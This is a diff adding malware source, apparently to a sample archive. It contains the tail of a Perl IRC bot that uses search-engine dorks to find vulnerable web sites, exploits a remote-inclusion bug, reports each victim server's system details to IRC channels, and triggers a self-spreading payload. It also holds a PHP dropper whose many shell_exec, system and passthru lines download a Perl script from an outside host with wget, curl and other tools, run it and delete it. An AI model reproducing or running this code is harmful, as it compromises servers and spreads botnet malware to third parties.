+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1ID: $id1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                my $test2 =
+                                  "http://" . $site . $bug . $spread . "?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /kangkung/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                            }
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                my @mlist = &msn($dork);
+                push( my @tot, @mlist );
+                my @puliti = &unici(@tot);
+                display( $dsp,
+                        "PRIVMSG $channel :9,1MSN  "
+                      . scalar(@tot)
+                      . " 9,1/9,1 "
+                      . scalar(@puliti)
+                      . "   9,1pentru4,1 $dork" );
+                my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                        display( $dsp,
+"PRIVMSG $channel :12MSN a terminat pentru4,1 $dork"
+                        );
+                    }
+                    my $test  = "http://" . $site . $bug . $id . "?";
+                    my $print = "http://" . $site . $bug . $printcmd . "?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1ID: $id1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                my $test2 =
+                                  "http://" . $site . $bug . $spread . "?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /kangkung/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                            }
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                my @asklist = &ask($dork);
+                push( my @tot, @asklist );
+                my @puliti = &unici(@tot);
+                display( $dsp,
+                        "PRIVMSG $channel :9,1ASK "
+                      . scalar(@tot)
+                      . " 9,1/9,1 "
+                      . scalar(@puliti)
+                      . " 9,1 pentru4,1 $dork" );
+                my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                        display( $dsp,
+"PRIVMSG $channel :9,1ASK a terminat pentru4,1 $dork"
+                        );
+                    }
+                    my $test  = "http://" . $site . $bug . $id . "?";
+                    my $print = "http://" . $site . $bug . $printcmd . "?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1ID: $id1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                my $test2 =
+                                  "http://" . $site . $bug . $spread . "?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /kangkung/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                            }
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+
+    if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
+        if ( my $pid = fork ) {
+            waitpid( $pid, 0 );
+        }
+        else {
+            if (fork) {
+                exit;
+            }
+            else {
+                my $bug       = $1;
+                my $dork      = $2;
+                my $contatore = 0;
+                my %hosts;
+                my @fireball = fireball($dork);
+                push( my @tot, @fireball );
+                my @puliti = &unici(@tot);
+                display( $dsp,
+                        "PRIVMSG $channel :9,1FIREBALL  "
+                      . scalar(@tot)
+                      . " 9,1/9,1 "
+                      . scalar(@puliti)
+                      . "   19,1 pentru4,1 $dork" );
+                my $uni = scalar(@puliti);
+
+                foreach my $site (@puliti) {
+                    $contatore++;
+                    if ( $contatore % 100 == 0 ) {
+                    }
+                    if ( $contatore == $uni - 1 ) {
+                        display( $dsp,
+"PRIVMSG $channel :9,1FIREBALL a terminat pentru4,1 $dork"
+                        );
+                    }
+                    my $test  = "http://" . $site . $bug . $id . "?";
+                    my $print = "http://" . $site . $bug . $printcmd . "?";
+                    my $req   = HTTP::Request->new( GET => $test );
+                    my $ua    = LWP::UserAgent->new();
+                    $ua->timeout(5);
+                    my $response = $ua->request($req);
+                    if ( $response->is_success ) {
+                        my $re = $response->content;
+                        if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1ID: $id1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                my $test2 =
+                                  "http://" . $site . $bug . $spread . "?";
+                                my $reqz = HTTP::Request->new( GET => $test2 );
+                                my $ua = LWP::UserAgent->new();
+                                my $response = $ua->request($reqz);
+                            }
+                        }
+                        elsif ( $re =~ /kangkung/ ) {
+                            my $hs = geths($print);
+                            $hosts{$hs}++;
+                            if ( $hosts{$hs} == "1" ) {
+                                $x = os($test);
+                                 ( $type, $space ) = split( /\,/, $x );
+                                sleep(4);
+                                display( $dsp,
+"PRIVMSG $channel :9,1Exploiting .."
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uname -a: 8,1$un"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Uptime: 8,1 $up"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Software: 8,1 $sof1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
+                                );
+                                display( $dsp,
+"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
+                                );
+                                display( $dsp,
+"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                                display( $dsp,
+"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
+                                );
+                            }
+                        }
+                    }
+                }
+            }
+            exit;
+        }
+    }
+}
+
+sub display() {
+    if ( $#_ == '1' ) {
+        my $dsp = $_[0];
+        print $dsp "$_[1]\n";
+    }
+    else {
+        print $dsp "$_[0]\n";
+    }
+}
+
+sub os() {
+    my $site = $_[0];
+    my $Res  = query($site);
+
+    while ( $Res =~ m/<br>uname -a:(.+?)\<br>/g ) {
+        $un = $1;
+    }
+    while ( $Res =~ m/<br>uptime:(.+?)\<br>/g ) {
+        $up = $1;
+    }
+    while ( $Res =~ m/<br>id:(.+?)\<br>/g ) {
+        $id1 = $1;
+    }
+    while ( $Res =~ m/<br>pwd:(.+?)\<br>/g ) {
+        $pwd1 = $1;
+    }
+    while ( $Res =~ m/<br>php:(.+?)\<br>/g ) {
+        $php1 = $1;
+    }
+    while ( $Res =~ m/<br>software:(.+?)\<br>/g ) {
+        $sof1 = $1;
+    }
+    while ( $Res =~ m/<br>server-ip:(.+?)\<br>/g ) {
+        $ip1 = $1;
+    }
+    while ( $Res =~ m/<br>server-name:(.+?)\<br>/g ) {
+        $name1 = $1;
+    }
+    while ( $Res =~ m/<br>os:(.+?)\<br>/g ) {
+        $os = $1;
+    }
+    while ( $Res =~ m/<br>free:(.+?)\<br>/g ) {
+        $free = $1;
+    }
+    while ( $Res =~ m/<br>used:(.+?)\<br>/g ) {
+        $used = $1;
+    }
+    while ( $Res =~ m/<br>total:(.+?)\<br>/g ) {
+        $all = $1;
+    }
+}
+
+sub googlet {
+    my @dominios = (
+        "ae", "com.ar", "at", "com.au", "be", "com.br",
+        "ca", "ch", "cl", "de", "dk", "eu", "sa", "id", "tr", "pl", "uk", "gov", "my", "mx"
+    );
+    my @country =
+      ( "AE", "AR", "AT", "AU", "BE", "BR", "CA", "CH", "CL", "DE", "DK" );
+    my @lst;
+    my $key = key( $_[0] );
+    my $c   = 0;
+    foreach my $i (@dominios) {
+        my @lista = google( $i, $key, $country[$c] );
+        push( @lst, @lista );
+        $c++;
+    }
+    return @lst;
+}
+
+sub google() {
+    my @lst;
+    my $i       = $_[0];
+    my $key     = $_[1];
+    my $country = $_[2];
+    for ( $b = 0 ; $b <= 100 ; $b += 100 ) {
+        my $Go =
+          (     "www.google." . $i
+              . "/search?hl=en&q="
+              . key($key)
+              . "&num=100&start="
+              . $b
+              . "&meta=cr%3Dcountry"
+              . $country );
+        my $Res = query($Go);
+        while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
+            if ( $1 !~ /google/ ) {
+                my $k    = $1;
+                my @grep = links($k);
+                push( @lst, @grep );
+            }
+        }
+    }
+    return @lst;
+}
+
+
+sub alltheweb() {
+    my @lst;
+    my $key = $_[0];
+    my $i   = 0;
+    my $pg  = 0;
+    for ( $i = 0 ; $i <= 1000 ; $i += 100 ) {
+        my $all =
+          ( "http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q="
+              . key($key) . "&o="
+              . $i );
+        my $Res = query($all);
+        while ( $Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g ) {
+            my $k = $1;
+            $k =~ s/ //g;
+            my @grep = links($k);
+            push( @lst, @grep );
+        }
+    }
+    return @lst;
+}
+
+sub altavista() {
+    my @lst;
+    my $key = $_[0];
+    for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
+        my $AlT =
+("http://www.altavista.com/web/results?itag=ody&q=".key($key)."&kgs=".$b);
+        my $Res = query($AlT);
+        while ( $Res =~ m/<span class=ngrn>(.+?)\//g ) {
+            if ( $1 !~ /altavista/ ) {
+                my $k = $1;
+                $k =~ s/<//g;
+                $k =~ s/ //g;
+                my @grep = links($k);
+                push( @lst, @grep );
+            }
+        }
+        if   ( $Res =~ /target=\"_self\">Succ/ ) { }
+        else                                     { return @lst; }
+    }
+    return @lst;
+}
+
+
+sub uolsub() {
+    my @lst;
+    my $key = $_[0];
+    for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
+        my $UoL =
+          (     "http://busca.uol.com.br/www/index.html?q="
+              . key($key)
+              . "&start="
+              . $i );
+        my $Res = query($UoL);
+        while ( $Res =~ m/<a href=\"http:\/\/([^>\"]*)/g ) {
+            my $k = $1;
+            if ( $k !~ /busca|uol|yahoo/ ) {
+                my $k    = $1;
+                my @grep = links($k);
+                push( @lst, @grep );
+            }
+        }
+    }
+    return @lst;
+}
+
+sub search() {
+    my $key = $_[0];
+    my $i   = 1;
+    my $pg  = 80;
+    my @lst;
+    my $av = 1;
+    while ( $i <= $pg ) {
+        my $search = "http://www.search.com/search?q=$key";
+        my $req    = HTTP::Request->new( GET => $search );
+        my $ua     = LWP::UserAgent->new();
+        $ua->agent('Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000');
+        my $response = $ua->request($req);
+        my $resp     = $response->content;
+        while ( $resp =~ m/<a href=\"?http:\/\/(.+?)\//g ) {
+            if ( $1 !~ /msn|live|google|yahoo/ ) {
+                my $ok = "$1/";
+                push( @lst, $ok );
+            }
+        }
+        $av = $av + 10;
+        $i++;
+    }
+    return @lst;
+}
+
+sub searchs() {
+    my @lst;
+    my $key = $_[0];
+    for ( $b = 1 ; $b <= 100 ; $b++ ) {
+        my $sc =
+          ( "http://www.search.com/search?q=" . key($key) . "&nav=" . $b );
+        my $Res = query($sc);
+        while ( $Res =~ m/<a href=\"?http:\/\/(.+?)/g ) {
+            my $k    = $1;
+            my @grep = links($k);
+            push( @lst, @grep );
+        }
+    }
+    return @lst;
+}
+
+sub msn() {
+    my @lst;
+    my $key = $_[0];
+    for ( $b = 1 ; $b <= 1000 ; $b += 10 ) {
+        my $MsN =
+          (     "http://search.live.com/results.aspx?q="
+              . key($key)
+              . "&first="
+              . $b
+              . "&FORM=PERE" );
+        my $Res = query($MsN);
+        while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
+            if ( $1 !~ /msn|live/ ) {
+                my $k    = $1;
+                my @grep = links($k);
+                push( @lst, @grep );
+            }
+        }
+    }
+    return @lst;
+}
+
+sub ask() {
+    my @lst;
+    my $key = $_[0];
+    my $i   = 0;
+    my $pg  = 0;
+    for ( $i = 0 ; $i <= 1000 ; $i += 10 ) {
+        my $Ask =
+          (     "http://it.ask.com/web?q="
+              . key($key)
+              . "&o=312&l=dir&qsrc=0&page="
+              . $i
+              . "&dm=all" );
+        my $Res = query($Ask);
+        while ( $Res =~
+            m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g )
+        {
+            my $k = $3;
+            $k =~ s/[\"\ ]//g;
+            my @grep = links($k);
+            push( @lst, @grep );
+        }
+    }
+    return @lst;
+}
+
+sub fireball() {
+    my $key    = $_[0];
+    my $inizio = 1;
+    my $pagine = 200;
+    my @lst;
+    my $av = 0;
+    while ( $inizio <= $pagine ) {
+        my $fireball =
+            "http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query="
+          . key($key)
+          . "&cat=fb_loc&idx=all&enc=utf-8";
+        my $Res = query($fireball);
+        while ( $Res =~ m/<a href=\"?http:\/\/(.+?)\//g ) {
+            if ( $1 !~ /msn|live|google|yahoo/ ) {
+                my $k    = "$1/";
+                my @grep = links($k);
+                push( @lst, @grep );
+            }
+        }
+        $av = $av + 10;
+        $inizio++;
+    }
+    return @lst;
+}
+
+sub links() {
+    my @l;
+    my $link = $_[0];
+    my $host = $_[0];
+    my $hdir = $_[0];
+    $hdir =~ s/(.*)\/[^\/]*$/\1/;
+    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    $host .= "/";
+    $link .= "/";
+    $hdir .= "/";
+    $host =~ s/\/\//\//g;
+    $hdir =~ s/\/\//\//g;
+    $link =~ s/\/\//\//g;
+    push( @l, $link, $host, $hdir );
+    return @l;
+}
+
+sub geths() {
+    my $host = $_[0];
+    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    return $host;
+}
+
+sub key() {
+    my $dork = $_[0];
+    $dork =~ s/ /\+/g;
+    $dork =~ s/:/\%3A/g;
+    $dork =~ s/\//\%2F/g;
+    $dork =~ s/&/\%26/g;
+    $dork =~ s/\"/\%22/g;
+    $dork =~ s/,/\%2C/g;
+    $dork =~ s/\\/\%5C/g;
+    return $dork;
+}
+
+sub end() {
+    $string = $_[0];
+    $string .= "/";
+    $string =~ s/\/\//\//;
+    while ( $string =~ /\/\// ) {
+        $string =~ s/\/\//\//;
+    }
+    return ($string);
+}
+
+sub query($) {
+    my $url = $_[0];
+    $url =~ s/http:\/\///;
+    my $host  = $url;
+    my $query = $url;
+    my $page  = "";
+    $host  =~ s/href=\"?http:\/\///;
+    $host  =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    $query =~ s/$host//;
+    if ( $query eq "" ) { $query = "/"; }
+    eval {
+        my $sock = IO::Socket::INET->new(
+            PeerAddr => "$host",
+            PeerPort => "80",
+            Proto    => "tcp"
+        ) or return;
+        print $sock
+"GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+        my @r = <$sock>;
+        $page = "@r";
+        close($sock);
+    };
+    return $page;
+}
+
+sub get_link() {
+    my $file_print = $_[1];
+    my $link       = $_[0];
+    my $host       = $_[0];
+    my $host_dir   = $_[0];
+    my @links;
+    $host_dir =~ s/(.*)\/[^\/]*$/\1/;
+    $host     =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    $host_dir = &end($host_dir);
+    $host     = &end($host);
+    $link     = &end($host);
+    push( @links, $link, $host, $host_dir );
+    open( $file, '>>', $file_print );
+    print $file "$link\n$host_dir\n$host\n";
+    close($file);
+    return @links;
+}
+
+sub unici {
+    my @unici = ();
+    my %visti = ();
+    foreach my $elemento (@_) {
+        $elemento =~ s/\/+/\//g;
+        next if $visti{$elemento}++;
+        push @unici, $elemento;
+    }
+    return @unici;
+}
+
+
+
+
+
diff --git a/Perl/Backdoor.Perl.IRCBot.p b/Perl/Backdoor.Perl.IRCBot.p
new file mode 100644
index 00000000..51262542
--- /dev/null
+++ b/Perl/Backdoor.Perl.IRCBot.p
@@ -0,0 +1,119 @@
+<?
+$dir = @getcwd();
+echo "Mic22<br>";
+$OS = @PHP_OS;
+echo "OSTYPE:$OS<br>";
+$free = disk_free_space($dir); 
+shell_exec('cd /tmp; wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+shell_exec('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+shell_exec('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+shell_exec('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+shell_exec('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
+shell_exec('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
+system('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+system('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+system('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+system('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+system('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
+system('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
+passthru('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+passthru('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+passthru('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+passthru('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+passthru('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
+passthru('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
+shell_exec('cd /tmp; wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+shell_exec('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+shell_exec('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+shell_exec('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+shell_exec('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
+shell_exec('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
+system('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+system('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+system('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
+system('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
